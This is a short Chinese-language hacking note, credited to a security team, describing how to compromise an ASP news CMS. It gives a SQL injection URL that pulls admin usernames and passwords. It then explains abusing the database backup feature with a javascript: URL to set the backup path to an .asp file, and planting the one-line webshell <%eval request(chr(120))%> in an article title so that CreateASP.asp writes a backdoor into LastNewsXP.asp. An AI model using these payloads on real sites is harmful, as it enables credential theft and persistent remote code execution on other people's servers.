来源:C.Rufus Security Team by cooldiyer + News.asp?click=1&shu=20 1 as NewsID,username as title,3 as updatetime,passwd as click,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from admin union select top 2 后台“图文管理”里添加文章,上传一个flash文件点附加管理里的备份压缩数据库地址为只读打开恢复数据库窗口。IE输入 javascript:alert(window.frames.document.forms[0].backpath.value="/data/x.asp"); 就可自定义马的地址了 也可以在后台添加一个文章,标题为<%eval request(chr(120))%> 然后访问CreateASP.asp更新LastNewsXP.asp这个文件后门就写到LastNewsXP.asp里面了 |